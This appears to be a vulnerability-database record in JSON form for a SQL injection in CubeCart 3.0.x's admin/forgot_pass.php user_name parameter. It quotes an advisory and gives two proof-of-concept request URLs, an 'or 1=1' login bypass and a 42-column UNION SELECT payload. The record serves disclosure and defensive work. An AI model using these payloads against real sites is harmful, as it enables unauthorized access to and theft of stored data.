Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-82248", "status": "cve,poc", "bulletinFamily": "exploit", "modified": "2014-07-01T00:00:00", "title": "CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-82248", "cvelist": [], "description": "No description provided by source.", "viewCount": 7, "published": "2014-07-01T00:00:00", "sourceData": "\n source: http://www.securityfocus.com/bid/20215/info\r\n\r\nCubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. \r\n\r\nA successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.\r\n\r\nhttp://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*\r\nhttp://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,\r\n23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*\n ", "id": "SSV:82248", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T14:29:48", "reporter": "Root", "enchantments": {"score": {"value": 7.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 7.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645424128, "score": 1698834068, "epss": 1678848988}, "_internal": {"score_hash": "ce30ad6120f865e368d377909a0f262d"}}
{}
CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection